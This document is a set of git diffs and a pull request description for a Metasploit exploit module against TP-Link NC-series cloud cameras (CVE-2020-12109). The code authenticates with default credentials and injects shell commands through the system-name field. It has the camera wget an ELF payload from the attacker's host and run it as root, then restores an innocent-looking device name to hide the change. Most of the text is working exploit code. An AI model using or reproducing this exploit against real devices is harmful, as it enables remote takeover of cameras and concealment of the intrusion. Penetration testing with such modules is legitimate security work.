-      return # payload is not ready yet
-    end
-
-    if !@elf_delivered
-      print_good('A request just came in...')
-      print_status('Sending the payload...')
-    end
-
-    send_response(cli, @payload)
-    @elf_delivered = true
-  end
-
-  def wait_payload_delivery
-    while ((datastore['TIMEOUT'] -= 1) > 0)
-      if @elf_delivered
-        return
-      end
-
-      sleep(1)
-    end
-
-    fail_with(Failure::Unknown, 'No requests received within timeout. Connectivity issues?')
-  end
 end

--- a/modules/exploits/linux/http/tp_link_ncxxx_bonjour_command_injection.rb
+++ b/modules/exploits/linux/http/tp_link_ncxxx_bonjour_command_injection.rb
@@ -82,7 +82,7 @@ class MetasploitModule < Msf::Exploit::Remote
         'method' => 'POST',
         'vars_post' => {
           "Username" => user,
-          "Password" => pass,
+          "Password" => pass
         }
       })
       if res.nil? or res.code == 404

--- a/modules/exploits/linux/http/tp_link_ncxxx_bonjour_command_injection.rb
+++ b/modules/exploits/linux/http/tp_link_ncxxx_bonjour_command_injection.rb
@@ -39,7 +39,7 @@ class MetasploitModule < Msf::Exploit::Remote
           [ 'URL', 'https://nvd.nist.gov/vuln/detail/CVE-2020-12109' ],
           [ 'URL', 'https://seclists.org/fulldisclosure/2020/May/2' ]
         ],
-      'DisclosureDate' => '29th April 2020',
+      'DisclosureDate' => '2020-04-29',
       'Platform'       => %w{ linux },
       'Arch' => ARCH_MIPSLE,
       'Targets'        =>

--- a/modules/exploits/linux/http/tp_link_ncxxx_bonjour_command_injection.rb
+++ b/modules/exploits/linux/http/tp_link_ncxxx_bonjour_command_injection.rb
@@ -12,83 +12,87 @@ class MetasploitModule < Msf::Exploit::Remote
   include Msf::Exploit::FileDropper
 
   def initialize(info = {})
-    super(update_info(info,
-      'Name'        => 'TP-Link Cloud Cameras NCXXX Bonjour Command Injection',
-      'Description' => %q{
-          TP-Link cloud cameras NCXXX series (NC200, NC210, NC220, NC230, 
+    super(
+      update_info(
+        info,
+        'Name' => 'TP-Link Cloud Cameras NCXXX Bonjour Command Injection',
+        'Description' => %q{
+          TP-Link cloud cameras NCXXX series (NC200, NC210, NC220, NC230,
           NC250, NC260, NC450) are vulnerable to an authenticated command
-          injection. In all devices except NC210, Despite a check on the name length in 
-          swSystemSetProductAliasCheck, no other checks are in place in order 
+          injection. In all devices except NC210, Despite a check on the name length in
+          swSystemSetProductAliasCheck, no other checks are in place in order
           to prevent shell metacharacters from being introduced. The system name
-          would then be used in swBonjourStartHTTP as part of a shell command 
+          would then be used in swBonjourStartHTTP as part of a shell command
           where arbitrary commands could be injected and executed as root. NC210 devices
           cannot be exploited directly via /setsysname.cgi due to proper input
           validation. NC210 devices are still vulnerable since swBonjourStartHTTP
           did not perform any validation when reading the alias name from the
           configuration file. The configuration file can be written, and code
           execution can be achieved by combining this issue with CVE-2020-12110.
-      },
-      'Author'      =>
-        [
-          'Pietro Oliva <pietroliva[at]gmail.com>'
-        ],
-      'License'     => MSF_LICENSE,
-      'References'  =>
+        },
+        'Author' => ['Pietro Oliva <pietroliva[at]gmail.com>'],
+        'License' => MSF_LICENSE,
+        'References' =>
         [
           [ 'URL', 'https://cve.mitre.org/cgi-bin/cvename.cgi?name=CVE-2020-12109' ],
           [ 'URL', 'https://nvd.nist.gov/vuln/detail/CVE-2020-12109' ],
-          [ 'URL', 'https://seclists.org/fulldisclosure/2020/May/2' ]
+          [ 'URL', 'https://seclists.org/fulldisclosure/2020/May/2' ],
+          [ 'CVE', '2020-12109']
         ],
-      'DisclosureDate' => '2020-04-29',
-      'Platform'       => %w{ linux },
-      'Arch' => ARCH_MIPSLE,
-      'Targets'        =>
+        'DisclosureDate' => '2020-04-29',
+        'Platform' => 'linux',
+        'Arch' => ARCH_MIPSLE,
+        'Targets' =>
         [
-          [ 'TP-Link NC200, NC220, NC230, NC250',
+          [
+            'TP-Link NC200, NC220, NC230, NC250',
             {
-            'Arch' => ARCH_MIPSLE,
-            'Platform' => 'linux'
+              'Arch' => ARCH_MIPSLE,
+              'Platform' => 'linux'
             }
           ],
-          [ 'TP-Link NC260, NC450',
+          [
+            'TP-Link NC260, NC450',
             {
-            'Arch' => ARCH_MIPSLE,
-            'Platform' => 'linux'
+              'Arch' => ARCH_MIPSLE,
+              'Platform' => 'linux'
             }
           ]
         ],
-      'DefaultTarget'  => 0,
-      ))
+        'DefaultTarget' => 0
+      )
+    )
 
     register_options(
       [
         OptString.new('USERNAME', [ true, 'The web interface username', 'admin' ]),
         OptString.new('PASSWORD', [ true, 'The web interface password for the specified username', 'admin' ]),
         OptInt.new('TIMEOUT', [true, 'Timeout for the HTTP Server to wait for the ELF payload request', 60])
-      ])
+      ]
+    )
   end
 
   def login
     user = datastore['USERNAME']
     pass = Base64.strict_encode64(datastore['PASSWORD'])
     if target.name == 'TP-Link NC260, NC450'
-      pass=Rex::Text.md5(pass)
+      pass = Rex::Text.md5(pass)
     end
-    
+
     print_status("Authenticating with #{user}:#{pass} ...")
     begin
-      res= send_request_cgi({
+      res = send_request_cgi({
         'uri' => '/login.fcgi',
         'method' => 'POST',
         'vars_post' => {
-          "Username" => user,
-          "Password" => pass
+          'Username' => user,
+          'Password' => pass
         }
       })
-      if res.nil? or res.code == 404
-        fail_with(Failure::NoAccess, "/login.fcgi did not reply correctly. Wrong target ip?")
+      if res.nil? || res.code == 404
+        fail_with(Failure::NoAccess, '/login.fcgi did not reply correctly. Wrong target ip?')
       end
-      if res.body =~ /\"errorCode\"\:0/ and res.headers.key?('Set-Cookie') and res.body =~ /token/
+      if res.body =~ /\"errorCode\"\:0/ && res.headers.key?('Set-Cookie') && res.body =~ /token/
         print_good("Logged-in as #{user}")
         @cookie = res.get_cookies.scan(/\s?([^, ;]+?)=([^, ;]*?)[;,]/)[0][1]
         print_good("Got cookie: #{@cookie}")
@@ -98,69 +102,67 @@ class MetasploitModule < Msf::Exploit::Remote
         fail_with(Failure::NoAccess, "Login failed with #{user}:#{pass}")
       end
     rescue ::Rex::ConnectionError
-      fail_with(Failure::Unreachable, "Connection failed")
+      fail_with(Failure::Unreachable, 'Connection failed')
     end
   end
 
-  def enableBonjour()
-      res = send_request_cgi({
-        'uri'    => '/setbonjoursetting.fcgi',
-        'method' => 'POST',
-        'encode_params' => false,
-        'cookie' => "sess=#{@cookie}",
-        'vars_post' => {
-          "bonjourState" => "1",
-          "token" => "#{@token}"
-        }
-      })
-      return res
-    rescue ::Rex::ConnectionError
-      vprint_error("Failed connection to the web server at #{rhost}:#{rport}")
-      return nil
+  def enable_bonjour
+    res = send_request_cgi({
+      'uri' => '/setbonjoursetting.fcgi',
+      'method' => 'POST',
+      'encode_params' => false,
+      'cookie' => "sess=#{@cookie}",
+      'vars_post' => {
+        'bonjourState' => '1',
+        'token' => @token.to_s
+      }
+    })
+    return res
+  rescue ::Rex::ConnectionError
+    vprint_error("Failed connection to the web server at #{rhost}:#{rport}")
+    return nil
   end
 
   def execute(cmd)
-    setSysName("$(#{cmd})")
-    enableBonjour()
+    sys_name("$(#{cmd})")
+    enable_bonjour
   end
 
-  def setSysName(cmd)
-      res = send_request_cgi({
-        'uri'    => '/setsysname.fcgi',
-        'method' => 'POST',
-        'encode_params' => false,
-        'cookie' => "sess=#{@cookie}",
-        'vars_post' => {
-          "sysname" => "#{cmd}",
-          "token" => "#{@token}"
-        }
-      })
-      return res
-    rescue ::Rex::ConnectionError
-      vprint_error("Failed connection to the web server at #{rhost}:#{rport}")
-      return nil
+  def sys_name(cmd)
+    res = send_request_cgi({
+      'uri' => '/setsysname.fcgi',
+      'method' => 'POST',
+      'encode_params' => false,
+      'cookie' => "sess=#{@cookie}",
+      'vars_post' => {
+        'sysname' => cmd,
+        'token' => @token.to_s
+      }
+    })
+    return res
+  rescue ::Rex::ConnectionError
+    vprint_error("Failed connection to the web server at #{rhost}:#{rport}")
+    return nil
   end
 
-  def startWebServer
-    oldSSL = datastore['SSL']
+  def start_web_server
+    old_ssl = datastore['SSL']
     datastore['SSL'] = false
-    lhost=datastore['LHOST']
+    lhost = datastore['LHOST']
     srv_port = datastore['SRVPORT']
 
     print_status("Starting web server on #{lhost}:#{srv_port} ...")
-    start_service({'Uri' => {
-      'Proc' => Proc.new { |cli, req|
-        on_request_uri(cli, req)
-      },
+    start_service({ 'Uri' => {
+      'Proc' => proc { |cli, req| on_request_uri(cli, req) },
       'Path' => '/'
-    }})
+    } })
 
-    datastore['SSL'] = oldSSL
+    datastore['SSL'] = old_ssl
   end
 
-  def uploadAndExecute
+  def upload_and_execute
     srv_port = datastore['SRVPORT']
-    lhost=datastore['LHOST']
+    lhost = datastore['LHOST']
 
     print_status("Triggering payload download from http://#{lhost}:#{srv_port}")
     filename = rand_text_alpha_lower(8)
@@ -168,8 +170,8 @@ class MetasploitModule < Msf::Exploit::Remote
     cmd = "wget http://#{lhost}:#{srv_port}/ -O /tmp/#{filename}"
 
     res = execute(cmd)
-    if (!res)
-      fail_with(Failure::Unknown, "Payload upload failed")
+    if !res
+      fail_with(Failure::Unknown, 'Payload upload failed')
     end
 
     wait_payload_delivery
@@ -177,8 +179,8 @@ class MetasploitModule < Msf::Exploit::Remote
     cmd = "f=/tmp/#{filename}; chmod %2bx $f; $f %26 rm $f"
     print_status("Executing #{filename}")
     res = execute(cmd)
-    if (!res)
-      fail_with(Failure::Unknown, "Unable to execute payload")
+    if !res
+      fail_with(Failure::Unknown, 'Unable to execute payload')
     end
 
   end
@@ -193,22 +195,22 @@ class MetasploitModule < Msf::Exploit::Remote
       datastore['SSL'] = false
     end
 
-    login()             # Get cookie and csrf token
-    startWebServer()    # Start payload delivery web server
-    uploadAndExecute()  # Trigger payload download and execution via command injection
-    setSysName("NC200") # Set back an innocent-looking device name
+    login # Get cookie and csrf token
+    start_web_server # Start payload delivery web server
+    upload_and_execute # Trigger payload download and execution via command injection
+    sys_name('NC200') # Set back an innocent-looking device name
 
   end
 
   # Handle payload delivery
-  def on_request_uri(cli, request)
-    if (not @payload)
+  def on_request_uri(cli, _request)
+    if !@payload
       return # payload is not ready yet
     end
 
-    if (not @elf_delivered)
-      print_good("A request just came in...")
-      print_status("Sending the payload...")
+    if !@elf_delivered
+      print_good('A request just came in...')
+      print_status('Sending the payload...')
     end
 
     send_response(cli, @payload)
@@ -216,13 +218,14 @@ class MetasploitModule < Msf::Exploit::Remote
   end
 
   def wait_payload_delivery
-    while ( (datastore['TIMEOUT'] -= 1) > 0 )
-      if (@elf_delivered)
+    while ((datastore['TIMEOUT'] -= 1) > 0)
+      if @elf_delivered
         return
       end
+
       sleep(1)
     end
-    
-    fail_with(Failure::Unknown, "No requests received within timeout. Connectivity issues?")
+
+    fail_with(Failure::Unknown, 'No requests received within timeout. Connectivity issues?')
   end
 end

--- a/modules/exploits/linux/http/tp_link_ncxxx_bonjour_command_injection.rb
+++ b/modules/exploits/linux/http/tp_link_ncxxx_bonjour_command_injection.rb
@@ -67,7 +67,7 @@ class MetasploitModule < Msf::Exploit::Remote
     register_options(
       [
         OptString.new('USERNAME', [ true, 'The web interface username', 'admin' ]),
-        OptString.new('PASSWORD', [ true, 'The web interface password for the specified username', 'admin' ]),
+        OptString.new('PASSWORD', [ true, 'The web interface password for the specified username', 'admin' ])
       ]
     )
   end


### PR DESCRIPTION
This module will allow exploitation of a command injection vulnerability in 6 NC series cloud cameras from TP-Link. 
The supported models are listed below:
-NC200
-NC220
-NC230
-NC250
-NC260
-NC450

I will send a pcap and/or video separately to prove the module works.